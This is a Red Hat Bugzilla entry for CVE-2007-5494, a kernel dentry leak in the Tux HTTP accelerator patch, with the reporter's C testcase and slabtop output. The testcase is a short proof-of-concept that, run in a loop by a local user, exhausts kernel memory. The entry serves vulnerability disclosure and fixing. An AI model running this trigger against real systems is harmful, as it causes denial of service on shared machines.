315051 – (CVE-2007-5494) CVE-2007-5494 open(O_ATOMICLOOKUP) leaks dentry

Bug 315051 (CVE-2007-5494) - CVE-2007-5494 open(O_ATOMICLOOKUP) leaks dentry

Summary: CVE-2007-5494 open(O_ATOMICLOOKUP) leaks dentry

Keywords:
Status:	CLOSED ERRATA
Alias:	CVE-2007-5494
Product:	Security Response
Classification:	Other
Component:	vulnerability
Sub Component:
Version:	unspecified
Hardware:	All
OS:	Linux
Priority:	low
Severity:	high
Target Milestone:	---
Assignee:	Red Hat Product Security
QA Contact:	Martin Jenner
Docs Contact:
URL:
Whiteboard:
Depends On:	363461 363471 363481 363491
Blocks:
TreeView+	depends on / blocked

Reported:	2007-10-02 06:37 UTC by Vasily Averin
Modified:	2022-05-16 10:14 UTC (History)
CC List:	5 users (show)
Fixed In Version:
Doc Type:	Bug Fix
Doc Text:
Clone Of:
Environment:
Last Closed:	2011-09-29 17:02:22 UTC
Embargoed:

Attachments	(Terms of Use)

Links
System	ID	Private	Priority	Status	Summary	Last Updated
Red Hat Product Errata	RHSA-2007:0993	0	normal	SHIPPED_LIVE	Important: kernel security update	2007-11-29 14:46:49 UTC
Red Hat Product Errata	RHSA-2007:1104	0	normal	SHIPPED_LIVE	Important: kernel security and bug fix update	2007-12-19 18:33:17 UTC

Description Vasily Averin 2007-10-02 06:37:04 UTC

Due issue described in 
https://bugzilla.redhat.com/show_bug.cgi?id=313681

open(O_ATOMICLOOKUP) leaks the dentry on the filesystems where d_revalidate is
implemented.
i.e
      open ("/proc/self/exe", O_RDONLY);
      open ("/proc/self/exe", O_RDONLY | 02000000);

leaks one dentry.

By this way it's possible to eat all the memory on the node or overflow
dentry->d_count.

Both RHEL4 and RHEL5 kernels are vulnerabled

Acknowledgements:

Red Hat would like to credit Vasily Averin for reporting this issue.

Comment 1 Vasily Averin 2007-10-02 07:17:19 UTC

compile the following testcase, run it in a cycle as a user and watch memory
leaks via slabtop

$ cat tst.c
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>

int
main (int argc, char *argv[])
{
        open ("/proc/self/exe", O_RDONLY);
        open ("/proc/self/exe", O_RDONLY | 02000000);
}



 Active / Total Objects (% used)    : 2082610 / 2086261 (99.8%)
 Active / Total Slabs (% used)      : 94487 / 94488 (100.0%)
 Active / Total Caches (% used)     : 95 / 140 (67.9%)
 Active / Total Size (% used)       : 360064.96K / 360385.06K (99.9%)
 Minimum / Average / Maximum Object : 0.01K / 0.17K / 128.00K

  OBJS ACTIVE  USE OBJ SIZE  SLABS OBJ/SLAB CACHE SIZE NAME
688286 688286 100%    0.13K  23734       29     94936K dentry_cache
682869 682869 100%    0.35K  62079       11    248316K proc_inode_cache
682558 682558 100%    0.04K   6758      101     27032K pid
  3672   3642  99%    0.05K     51       72       204K buffer_head
  3276   3166  96%    0.04K     39       84       156K sysfs_dir_cache
  2576   2483  96%    0.08K     56       46       224K vm_area_struct
  2424   2417  99%    0.48K    303        8      1212K ext3_inode_cache
  2373   2373 100%    0.03K     21      113        84K size-32
  1991   1974  99%    0.33K    181       11       724K inode_cache
  1820   1800  98%    0.27K    130       14       520K radix_tree_node
  1475   1295  87%    0.06K     25       59       100K size-64
  1350   1350 100%    0.12K     45       30       180K size-128
  1016    871  85%    0.01K      4      254        16K anon_vma
  1008    817  81%    0.16K     42       24       168K filp
   858    690  80%    0.05K     11       78        44K selinux_inode_security
   736    648  88%    0.04K      8       92        32K Acpi-Operand
   444    422  95%    2.00K    222        2       888K size-2048
   376    376 100%    0.50K     47        8       188K size-512
   375    375 100%    0.25K     25       15       100K size-256
   360    294  81%    0.19K     18       20        72K skbuff_head_cache
   360    301  83%    0.09K      9       40        36K bio
   338    297  87%    0.02K      2      169         8K Acpi-Namespace
   288    268  93%    0.43K     32        9       128K shmem_inode_cache
   254      8   3%    0.01K      1      254         4K revoke_table
   236    236 100%    0.06K      4       59        16K fs_cache

Comment 4 Eric Sandeen 2007-11-02 15:17:38 UTC

Mark, it's tux, via linux-2.6-tux.patch, which introduces this:

... 
need_revalidate:
+       if (atomic)
+               return -EWOULDBLOCKIO;
        if (dentry->d_op->d_revalidate(dentry, nd))
                goto done;
        if (d_invalidate(dentry))

that return forgets to drop the dentry

-Eric

Comment 6 Mark J. Cox 2007-11-19 09:11:48 UTC

told vendor-sec under embargo

Comment 9 Mark J. Cox 2007-11-29 08:28:52 UTC

No other vendor said they were vulnerable to this.

Description used in text: A memory leak was found in the Tux HTTP accelerator
patch. A local user could use this flaw to cause a denial of service (memory
exhaustion). (CVE-2007-5494)

Removing embargo.

Comment 12 Kurt Seifried 2011-09-29 17:02:22 UTC

All z-stream children bugs have been closed, future tracking bugs still open, parent is no longer needed.

Note You need to log in before you can comment on or make changes to this bug.